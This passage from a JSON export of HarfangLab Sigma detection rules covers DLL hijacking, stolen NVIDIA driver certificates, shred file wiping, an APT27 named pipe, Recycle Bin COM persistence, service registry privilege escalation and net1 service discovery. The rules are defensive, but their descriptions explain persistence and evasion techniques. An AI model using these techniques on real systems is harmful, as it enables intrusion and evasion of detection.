"content": "title: DLL Hijacking via bdservicehost.exe\nid: 0cde446e-6eec-4d9c-a4df-ad0b836c3406\ndescription: |\n Detects potential Windows DLL Hijacking via bdservicehost.exe, seen in a previous PlugX attack.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/08\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdservicehost.exe'\n ProcessSignature: 'Bitdefender SRL'\n ImageLoaded|endswith: '\\log.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\BitDefender\\'\n - '?:\\Program Files (x86)\\BitDefender\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\BitDefender\\'\n - '?:\\Program Files (x86)\\BitDefender\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Bitdefender SRL'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0cde446e-6eec-4d9c-a4df-ad0b836c3406",
"rule_name": "DLL Hijacking via bdservicehost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bdservicehost.exe, seen in a previous PlugX attack.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0cf16516-206d-4746-b55e-291542898e67",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618982Z",
"creation_date": "2026-03-23T11:45:34.618984Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618988Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_klist.yml",
"content": "title: DLL Hijacking via klist.exe\nid: 0cf16516-206d-4746-b55e-291542898e67\ndescription: |\n Detects potential Windows DLL Hijacking via klist.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'klist.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\netutils.dll'\n - '\\secur32.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0cf16516-206d-4746-b55e-291542898e67",
"rule_name": "DLL Hijacking via klist.exe",
"rule_description": "Detects potential Windows DLL Hijacking via klist.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079072Z",
"creation_date": "2026-03-23T11:45:34.079074Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079079Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_nvidia_stolen_cert_driver_load.yml",
"content": "title: Driver Loaded Signed with NVIDIA Stolen Certificate\nid: 0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8\ndescription: |\n Detects the loading of driver signed using one of NVIDIA's stolen certificates.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to find the process responsible for this action using the related timeline or through jobs, as well as to analyze the loaded driver to look for malicious content and actions.\nreferences:\n - https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/12\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection_cert_1:\n DriverSignatureSignerThumbprint: '579aec4489a2ca8a2a09df5dc0323634bd8b16b7'\n\n filter_timestamp_cert_1:\n DriverPETimestampStr|startswith:\n - '2011-'\n - '2012-'\n - '2013-'\n - '2014-01'\n - '2014-02'\n - '2014-03'\n - '2014-04'\n - '2014-05'\n - '2014-06'\n - '2014-07'\n - '2014-08'\n\n selection_cert_2:\n DriverSignatureSignerThumbprint: '30632ea310114105969d0bda28fdce267104754f'\n\n filter_timestamp_cert_2:\n DriverPETimestampStr|startswith:\n - '2015-07'\n - '2015-08'\n - '2015-09'\n - '2015-10'\n - '2015-11'\n - '2015-12'\n - '2016-'\n - '2017-'\n - '2018-01'\n - '2018-02'\n - '2018-03'\n - '2018-04'\n - '2018-05'\n - '2018-06'\n - '2018-07'\n\n filter_copyright:\n LegalCopyright|contains:\n - 'NVIDIA'\n - 'Galasoft'\n\n condition: ((selection_cert_1 and not filter_timestamp_cert_1) or (selection_cert_2 and not filter_timestamp_cert_2)) and not filter_copyright\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8",
"rule_name": "Driver Loaded Signed with NVIDIA Stolen Certificate",
"rule_description": "Detects the loading of driver signed using one of NVIDIA's stolen certificates.\nThis can be the sign of a malware using a fake signature to evade AV/EDR detection.\nIt is recommended to find the process responsible for this action using the related timeline or through jobs, as well as to analyze the loaded driver to look for malicious content and actions.\n",
"rule_creation_date": "2022-07-12",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d4bd1c5-18a6-4c6e-a08e-48adc41e2884",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628455Z",
"creation_date": "2026-03-23T11:45:34.628457Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628462Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/shred.1.html",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-3---overwrite-and-delete-a-file-with-shred",
"https://attack.mitre.org/techniques/T1070/004/",
"https://attack.mitre.org/techniques/T1485/"
],
"name": "t1070_004_delete_with_shred.yml",
"content": "title: File Deleted via shred\nid: 0d4bd1c5-18a6-4c6e-a08e-48adc41e2884\ndescription: |\n Detects the execution of shred, a tool used to overwrite a file's content before deleting it.\n Attackers can overwrite any files left by their malicious activities to prevent forensic and slow the investigation, or use shred to destroy sensitive information as part of a ransomware attack.\n It is recommended to investigate the parent process as well as the files being deleted to determine whether this action was legitimate.\nreferences:\n - https://man7.org/linux/man-pages/man1/shred.1.html\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-3---overwrite-and-delete-a-file-with-shred\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/techniques/T1485/\ndate: 2023/01/06\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.impact\n - attack.t1485\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Shred\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/shred'\n CommandLine|contains:\n - ' -u'\n - ' -?u'\n - ' -??u'\n - ' -???u'\n\n exclusion_space:\n CommandLine|contains:\n - ' - u'\n - ' -? u'\n - ' -?? u'\n\n exclusion_plz_sandbox:\n ParentCommandLine: '/tmp/plz_sandbox/third_party/system_tools/logrotate/logrotate -v -m ./mailer -s state test-config.15 --force'\n\n exclusion_blacknoise:\n ParentCommandLine: 'sudo -S shred -u /tmp/blacknoise_BLCKNS_DEF_L0007.001'\n\n exclusion_logrotate:\n ParentCommandLine: '/usr/sbin/logrotate /etc/logrotate.conf'\n CommandLine: 'shred -u -'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d4bd1c5-18a6-4c6e-a08e-48adc41e2884",
"rule_name": "File Deleted via shred",
"rule_description": "Detects the execution of shred, a tool used to overwrite a file's content before deleting it.\nAttackers can overwrite any files left by their malicious activities to prevent forensic and slow the investigation, or use shred to destroy sensitive information as part of a ransomware attack.\nIt is recommended to investigate the parent process as well as the files being deleted to determine whether this action was legitimate.\n",
"rule_creation_date": "2023-01-06",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d4ebd0c-1c3f-4c6b-8c60-121639f8b842",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595420Z",
"creation_date": "2026-03-23T11:45:34.595423Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595431Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.intrinsec.com/apt27-analysis/",
"https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
"https://attack.mitre.org/techniques/T1106/"
],
"name": "t1106_apt27_named_pipe_connection.yml",
"content": "title: Suspicious APT27 Related Named Pipe Connected\nid: 0d4ebd0c-1c3f-4c6b-8c60-121639f8b842\ndescription: |\n Detects the creation or connection of/to a Named Pipe named \"testPipe\".\n The name is related to the APT27 threat, more specifically their HyperBro malware.\n It is recommended to verify that this is a legitimate developer pipe.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.APT27\n - classification.Windows.Malware.HyperBro\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\testPipe'\n\n exclusion_hellodoc:\n ProcessImage|endswith:\n - '\\IMAGINE Editions\\HelloDoc\\HelloDoc.exe'\n - '\\imagine editions\\hellodoc\\HelloDoc Acces Vidal.exe'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - Legitimate developer creation of a named pipe called \"testPipe\"\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d4ebd0c-1c3f-4c6b-8c60-121639f8b842",
"rule_name": "Suspicious APT27 Related Named Pipe Connected",
"rule_description": "Detects the creation or connection of/to a Named Pipe named \"testPipe\".\nThe name is related to the APT27 threat, more specifically their HyperBro malware.\nIt is recommended to verify that this is a legitimate developer pipe.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d51dffe-a29c-4bbf-a33a-b2308e77bfda",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085080Z",
"creation_date": "2026-03-23T11:45:34.085082Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085086Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/recyclebin.md",
"https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_recycle_bin_persistence.yml",
"content": "title: Recycle Bin COM Object Modified\nid: 0d51dffe-a29c-4bbf-a33a-b2308e77bfda\ndescription: |\n Detects the creation of the subkey \"\\shell\\open\\command\" under the Recycle Bin ClassID in the registry.\n The Windows Registry uses ClassID subkeys to define shell actions for system folders and objects. The Recycle Bin has a specific ClassID ({645FF040-5081-101B-9F08-00AA002F954E}) that can be modified with a \"\\shell\\open\\command\" subkey to override the default open action.\n When this subkey is created or modified under the Recycle Bin's ClassID, it redirects the default open action to execute a custom command.\n Attackers exploit this mechanism to achieve persistence by ensuring their malicious code runs whenever a user attempts to access the Recycle Bin through Windows Explorer or other file management operations.\n It is recommended to verify whether the registry modification is legitimate and analyze the command specified in the modified registry key to determine if it points to malicious executables or scripts.\nreferences:\n - https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/recyclebin.md\n - https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2025/04/24\nmodified: 2025/10/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1546.015\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'CreateKey'\n TargetObject|endswith: '\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d51dffe-a29c-4bbf-a33a-b2308e77bfda",
"rule_name": "Recycle Bin COM Object Modified",
"rule_description": "Detects the creation of the subkey \"\\shell\\open\\command\" under the Recycle Bin ClassID in the registry.\nThe Windows Registry uses ClassID subkeys to define shell actions for system folders and objects. The Recycle Bin has a specific ClassID ({645FF040-5081-101B-9F08-00AA002F954E}) that can be modified with a \"\\shell\\open\\command\" subkey to override the default open action.\nWhen this subkey is created or modified under the Recycle Bin's ClassID, it redirects the default open action to execute a custom command.\nAttackers exploit this mechanism to achieve persistence by ensuring their malicious code runs whenever a user attempts to access the Recycle Bin through Windows Explorer or other file management operations.\nIt is recommended to verify whether the registry modification is legitimate and analyze the command specified in the modified registry key to determine if it points to malicious executables or scripts.\n",
"rule_creation_date": "2025-04-24",
"rule_modified_date": "2025-10-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d55020f-bbfc-470c-addf-f5feb6e37098",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609954Z",
"creation_date": "2026-03-23T11:45:34.609967Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609975Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_registry_unprivileged_user_modifying_service_registry_config.yml",
"content": "title: Service Registry Configuration Modified by an Unprivileged User\nid: 0d55020f-bbfc-470c-addf-f5feb6e37098\ndescription: |\n Detects a service registry configuration modification by an unprivileged user.\n Attackers can use registry permission weaknesses to perform privilege escalation by modifying a privileged service configuration in the registry.\n It is recommended to investigate the modified registry key to look for paths pointing to malicious content.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/07\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.persistence\n - attack.t1574.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n ProcessIntegrityLevel:\n - 'Low'\n - 'Medium'\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\FailureCommand'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ServiceDll'\n\n exclusion_novell:\n # \\??\\C:\\Program Files\\Novell\\Client\\XTier\\Drivers\\nccache.sys\n Details|contains: ':\\Program Files\\Novell\\Client\\XTier\\Drivers\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d55020f-bbfc-470c-addf-f5feb6e37098",
"rule_name": "Service Registry Configuration Modified by an Unprivileged User",
"rule_description": "Detects a service registry configuration modification by an unprivileged user.\nAttackers can use registry permission weaknesses to perform privilege escalation by modifying a privileged service configuration in the registry.\nIt is recommended to investigate the modified registry key to look for paths pointing to malicious content.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d5af151-1912-4b7d-aa38-cacd25e43f67",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296528Z",
"creation_date": "2026-03-23T11:45:35.296531Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296535Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1007/"
],
"name": "t1007_net_start.yml",
"content": "title: System Service Discovered via net.exe\nid: 0d5af151-1912-4b7d-aa38-cacd25e43f67\ndescription: |\n Detects the execution of net1.exe with start option.\n Adversaries can use this command during discovery phase to enumerate started system services.\n It is recommended to investigate the parent process to look for malicious content or other malicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\ndate: 2022/11/14\nmodified: 2026/02/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_commandline:\n CommandLine|endswith: ' start'\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_programfiles:\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - Ancestors|startswith:\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\'\n\n exclusion_incotec:\n # https://www.incotec-software.com/\n - CurrentDirectory|contains: '\\Incotec\\Exec\\Bin'\n - Ancestors|contains: '|?:\\Incotec\\UNIX\\bin\\sh.exe|'\n\n exclusion_syracuse:\n - CurrentDirectory|endswith: '\\syracuse\\agent\\'\n - Ancestors|endswith: '\\syracuse\\agent\\Agent.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_egurkha:\n CommandLine: '?:\\Windows\\system32\\net1 start'\n Ancestors|startswith: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files\\eGurkha\\JRE\\bin\\java.exe|'\n\n exclusion_scripts:\n GrandparentCommandLine:\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*.bat'\n - '?:\\Windows\\SYSTEM32\\cmd.exe /c ?:\\\\*.cmd'\n Ancestors:\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\taskeng.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_oracle:\n GrandparentCommandLine:\n - 'cmd.exe /x/d/c net start | find oracle /i'\n - 'cmd.exe /x/d/c net start | find oracleservice /i'\n Ancestors|contains: '|?:\\Perl64\\bin\\perl.exe|?:\\Windows\\System32\\cmd.exe|'\n\n exclusion_datto:\n Ancestors: '?:\\Windows\\System32\\net.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\CentraStage\\CagService.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_hexaflux:\n GrandparentCommandLine: 